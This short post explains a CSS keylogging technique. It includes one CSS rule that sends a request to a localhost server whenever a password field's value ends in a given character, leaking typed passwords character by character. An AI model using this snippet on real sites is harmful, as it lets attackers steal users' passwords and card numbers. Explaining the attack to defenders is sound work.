CSS Keylogger, stealing data with the style sheet.
A bizarre piece software popped up last month. https://github.com/maxchehab/CSS-Keylogging
A few things to mind.
It's not system wide
it is also really specific on what data you can obtain in this method.
It is still dangerous, data like passwords and creditcard numbers can be stolen.
This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.
For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.
The css-code
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}
A extension on the video